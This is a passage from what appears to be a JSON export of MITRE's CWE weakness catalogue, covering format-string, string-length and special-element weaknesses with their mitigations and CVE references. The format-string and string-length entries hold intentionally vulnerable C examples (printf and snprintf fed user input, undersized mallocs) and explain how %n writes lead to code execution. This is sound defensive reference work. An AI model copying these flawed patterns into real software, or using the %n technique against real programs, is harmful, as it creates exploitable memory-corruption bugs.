Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Other Length Calculation Error","attr":{"@_Date":"2008-01-30"}}}},"132":{"attr":{"@_ID":"132","@_Name":"DEPRECATED: Miscalculated Null Termination","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This entry has been deprecated because it was a duplicate of CWE-170. All content has been transferred to CWE-170.","Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-07-19","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Common_Consequences, Description, Likelihood_of_Exploit, Name, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Name"}],"Previous_Entry_Name":[{"#text":"Miscalculated Null Termination","attr":{"@_Date":"2008-09-09"}},{"#text":"DEPRECATED (Duplicate): Miscalculated Null Termination","attr":{"@_Date":"2021-07-20"}}]}},"134":{"attr":{"@_ID":"134","@_Name":"Use of Externally-Controlled Format String","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses a function that accepts a format string as an argument, but the format string originates from an external source.","Extended_Description":{"xhtml:p":["When an attacker can modify an externally-controlled format string, this can lead to buffer overflows, denial of service, or data representation problems.","It should be noted that in some circumstances, such as internationalization, the set of format strings is externally controlled by design. If the source of these format strings is trusted (e.g. only contained in library files that are only modifiable by the system administrator), then the external control might not itself pose a vulnerability."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"123","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Often"}},{"attr":{"@_Name":"C++","@_Prevalence":"Often"}},{"attr":{"@_Name":"Perl","@_Prevalence":"Rarely"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation","Note":"The programmer rarely intends for a format string to be externally-controlled at all. This weakness is frequently introduced in code that constructs log messages, where a constant format string is omitted."},{"Phase":"Implementation","Note":"In cases such as localization and internationalization, the language-specific message repositories could be an avenue for exploitation, but the format string issue would be resultant, since attacker control of those repositories would also allow modification of message length, format, and content."}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Memory","Note":"Format string problems allow for information disclosure which can severely simplify exploitation of the program."},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Modify Memory","Execute Unauthorized Code or Commands"],"Note":"Format string problems can result in the execution of arbitrary code."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-1"},"Method":"Automated Static Analysis","Description":"This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives."},{"Method":"Black Box","Description":"Since format strings often occur in rarely-occurring erroneous conditions (e.g. for error message logging), they can be difficult to detect using black box methods. It is highly likely that many latent issues exist in executables that do not have associated source code (or equivalent source.","Effectiveness":"Limited"},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode simple extractor - strings, ELF readers, etc."}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Focused Manual Spotcheck - Focused manual analysis of source"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Warning Flags"}}]}},"Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Choose a language that is not subject to this flaw."},{"Phase":"Implementation","Description":"Ensure that all format string functions are passed a static string which cannot be controlled by the user, and that the proper number of arguments are always sent to that function as well. If at all possible, use functions that do not support the %n operator in format strings. [REF-116] [REF-117]"},{"Phase":"Build and Compilation","Description":"Run compilers and linkers with high warning levels, since they may detect incorrect usage."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following program prints a string provided as an argument.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#include <stdio.h>void printWrapper(char *string) {}int main(int argc, char **argv) {}","xhtml:br":["","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"printf(string);","xhtml:br":""}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char buf[5012];memcpy(buf, argv[1], 5012);printWrapper(argv[1]);return (0);","xhtml:br":["","","",""]}}]}},"Body_Text":"The example is exploitable, because of the call to printf() in the printWrapper() function. Note: The stack buffer was added to make exploitation more simple."},{"Intro_Text":"The following code copies a command line argument into a buffer using snprintf().","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int main(int argc, char **argv){}","xhtml:div":{"#text":"char buf[128];...snprintf(buf,128,argv[1]);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"This code allows an attacker to view the contents of the stack and write to the stack using a command line argument containing a sequence of formatting directives. The attacker can read from the stack by providing more formatting directives, such as %x, than the function takes as arguments to be formatted. (In this example, the function takes no arguments to be formatted.) By using the %n formatting directive, the attacker can write to the stack, causing snprintf() to write the number of bytes output thus far to the specified argument (rather than reading a value from the argument, which is the intended behavior). A sophisticated version of this attack will use four staggered writes to completely control the value of a pointer on the stack."},{"Intro_Text":"Certain implementations make more advanced attacks even easier by providing format directives that control the location in memory to read from or write to. An example of these directives is shown in the following code, written for glibc:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":"printf(\\"%d %d %1$d %1$d\\\\n\\", 5, 9);"},"Body_Text":"This code produces the following output: 5 9 5 5 It is also possible to use half-writes (%hn) to accurately control arbitrary DWORDS in memory, which greatly reduces the complexity needed to execute an attack that would otherwise require four staggered writes, such as the one mentioned in the first example."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1825","Description":"format string in Perl program","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1825"},{"Reference":"CVE-2001-0717","Description":"format string in bad call to syslog function","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0717"},{"Reference":"CVE-2002-0573","Description":"format string in bad call to syslog function","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0573"},{"Reference":"CVE-2002-1788","Description":"format strings in NNTP server responses","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1788"},{"Reference":"CVE-2006-2480","Description":"Format string vulnerability exploited by triggering errors or warnings, as demonstrated via format string specifiers in a .bmp filename.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2480"},{"Reference":"CVE-2007-2027","Description":"Chain: untrusted search path enabling resultant format string by loading malicious internationalization messages","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2027"}]},"Functional_Areas":{"Functional_Area":["Logging","Error Handling","String Processing"]},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Format string vulnerability"},{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Format String"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Format string problem"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO30-C","Entry_Name":"Exclude user input from format strings","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO47-C","Entry_Name":"Use valid format strings","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A1","Entry_Name":"Unvalidated Input","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":6,"Entry_Name":"Format String"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"IDS06-J","Entry_Name":"Exclude user input from format strings"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"IDS30-PL","Entry_Name":"Exclude user input from format strings","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-134"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"135"}},{"attr":{"@_CAPEC_ID":"67"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-116"}},{"attr":{"@_External_Reference_ID":"REF-117"}},{"attr":{"@_External_Reference_ID":"REF-118"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 5, "Format String Bugs" Page 147"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 6: Format String Problems." Page 109"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, "C Format Strings", Page 422"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-134"}}]},"Notes":{"Note":[{"attr":{"@_Type":"Applicable Platform"},"xhtml:p":"This weakness is possible in any programming language that support format strings."},{"attr":{"@_Type":"Other"},"xhtml:p":["While Format String vulnerabilities typically fall under the Buffer Overflow category, technically they are not overflowed buffers. The Format String vulnerability is fairly new (circa 1999) and stems from the fact that there is no realistic way for a function that takes a variable number of arguments to determine just how many arguments were passed in. The most common functions that take a variable number of arguments, including C-runtime functions, are the printf() family of calls. The Format String problem appears in a number of ways. A *printf() call without a format specifier is dangerous and can be exploited. For example, printf(input); is exploitable, while printf(y, input); is not exploitable in that context. The result of the first call, used incorrectly, allows for an attacker to be able to peek at stack memory since the input string will be used as the format specifier. The attacker can stuff the input string with format specifiers and begin reading stack values, since the remaining parameters will be pulled from the stack. Worst case, this improper use may give away enough control to allow an arbitrary value (or values in the case of an exploit program) to be written into the memory of the running program.","Frequently targeted entities are file names, process names, identifiers.","Format string problems are a classic C/C++ issue that are now rare due to the ease of discovery. One main reason format string vulnerabilities can be exploited is due to the %n operator. The %n operator will write the number of characters, which have been printed by the format string therefore far, to the memory pointed to by its argument. Through skilled creation of a format string, a malicious user may use values on the stack to create a write-what-where condition. Once this is achieved, they can execute arbitrary code. Other operators can be used as well; for example, a %9999s operator could also trigger a buffer overflow, or when used in file-formatting functions like fprintf, it can generate a much larger output than intended."]},{"#text":"Format string issues are under-studied for languages other than C. Memory or disk consumption, control flow or variable alteration, and data corruption may result from format string exploitation in applications written in other languages such as Perl, PHP, Python, etc.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Detection_Factors, Modes_of_Introduction, Relationships, Other_Notes, Research_Gaps, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"KDM Analytics","Modification_Date":"2009-07-17","Modification_Comment":"Improved the White_Box_Definition"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Detection_Factors, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Detection_Factors, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Description, Modes_of_Introduction, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Functional_Areas, Likelihood_of_Exploit, Other_Notes, References, Relationships, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations, Relationships"}],"Previous_Entry_Name":{"#text":"Uncontrolled Format String","attr":{"@_Date":"2015-12-07"}}}},"135":{"attr":{"@_ID":"135","@_Name":"Incorrect Calculation of Multi-Byte String Length","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not correctly calculate the length of strings that can contain wide or multi-byte characters.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":{"xhtml:p":["There are several ways in which improper string length checking may result in an exploitable condition. All of these, however, involve the introduction of buffer overflow conditions in order to reach an exploitable state.","The first of these issues takes place when the output of a wide or multi-byte character string, string-length function is used as a size for the allocation of memory. While this will result in an output of the number of characters in the string, note that the characters are most likely not a single byte, as they are with standard character strings. So, using the size returned as the size sent to new or malloc and copying the string to this newly allocated memory will result in a buffer overflow.","Another common way these strings are misused involves the mixing of standard string and wide or multi-byte string functions on a single string. Invariably, this mismatched information will result in the creation of a possibly exploitable buffer overflow condition."]}}},"Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"This weakness may lead to a buffer overflow. Buffer overflows often can be used to execute arbitrary code, which is usually outside the scope of a program\'s implicit security policy. This can often be used to subvert any other security service."},{"Scope":["Availability","Confidentiality"],"Impact":["Read Memory","DoS: Crash, Exit, or Restart","DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)"],"Note":"Out of bounds memory access will very likely result in the corruption of relevant memory, and perhaps instructions, possibly leading to a crash. Other attacks leading to lack of availability are possible, including putting the program into an infinite loop."},{"Scope":"Confidentiality","Impact":"Read Memory","Note":"In the case of an out-of-bounds read, the attacker may have access to sensitive information. If the sensitive information contains system details, such as the current buffers position in memory, this knowledge can be used to craft further attacks, possibly with more severe consequences."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Strategy":"Input Validation","Description":"Always verify the length of the string unit character."},{"Phase":"Implementation","Strategy":"Libraries or Frameworks","Description":"Use length computing functions (e.g. strlen, wcslen, etc.) appropriately with their equivalent type (e.g.: byte, wchar_t, etc.)"}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example would be exploitable if any of the commented incorrect malloc calls were used.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#include <stdio.h>#include <strings.h>#include <wchar.h>int main() {}","xhtml:br":["","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"wchar_t wideString[] = L\\"The spazzy orange tiger jumped \\" \\\\\\"over the tawny jaguar.\\";wchar_t *newString;printf(\\"Strlen() output: %d\\\\nWcslen() output: %d\\\\n\\",strlen(wideString), wcslen(wideString));/* Wrong because the number of chars in a string isn\'t related to its length in bytes //newString = (wchar_t *) malloc(strlen(wideString));*//* Wrong because wide characters aren\'t 1 byte long! //newString = (wchar_t *) malloc(wcslen(wideString));*//* Wrong because wcslen does not include the terminating null */newString = (wchar_t *) malloc(wcslen(wideString) * sizeof(wchar_t));/* correct! */newString = (wchar_t *) malloc((wcslen(wideString) + 1) * sizeof(wchar_t));/* ... */","xhtml:br":["","","","","","","","","","","","","","","","","","","","","",""]}}}},{"attr":{"@_Nature":"result"},"xhtml:div":{"#text":"Strlen() output: 0Wcslen() output: 53","xhtml:br":""}}],"Body_Text":"The output from the printf() statement would be:"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Improper string length checking"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"FIO10-J","Entry_Name":"Ensure the array is filled when using read() to fill an array"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP10","Entry_Name":"Incorrect Buffer Length Computation"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 5, "Unicode and ANSI Buffer Size Mismatches" Page 153"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Enabling_Factors_for_Exploitation, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Enabling_Factors_for_Exploitation, Modes_of_Introduction, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated References"}],"Contribution":{"attr":{"@_Type":"Feedback"},"Contribution_Name":"Gregory Padgett","Contribution_Organization":"Unitrends","Contribution_Date":"2010-01-11","Contribution_Comment":"correction to Demonstrative_Example"},"Previous_Entry_Name":{"#text":"Improper String Length Checking","attr":{"@_Date":"2008-04-11"}}}},"138":{"attr":{"@_ID":"138","@_Name":"Improper Neutralization of Special Elements","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as control elements or syntactic markers when they are sent to a downstream component.","Extended_Description":"Most languages and protocols have their own special elements such as characters and reserved words. These special elements can carry control implications. If software does not prevent external control or influence over the inclusion of such special elements, the control flow of the program may be altered from what was intended. For example, both Unix and Windows interpret the symbol < (\\"less than\\") as meaning \\"read input from a file\\".","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"707","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Other"],"Impact":["Execute Unauthorized Code or Commands","Alter Execution Logic","DoS: Crash, Exit, or Restart"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Developers should anticipate that special elements (e.g. delimiters, symbols) will be injected into input vectors of their software system. One defense is to create an allowlist (e.g. a regular expression) that defines valid input according to the requirements specifications. Strictly filter any input that does not match against the allowlist. Properly encode your output, and quote any elements that have special meaning to the component with which you are communicating."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"Phase":"Implementation","Description":"Use and specify an appropriate output encoding to ensure that the special elements are well-defined. A normal byte sequence in one encoding could be a special element in another."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-0677","Description":"Read arbitrary files from mail client by providing a special MIME header that is internally used to store pathnames for attachments.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0677"},{"Reference":"CVE-2000-0703","Description":"Setuid program does not cleanse special escape sequence before sending data to a mail 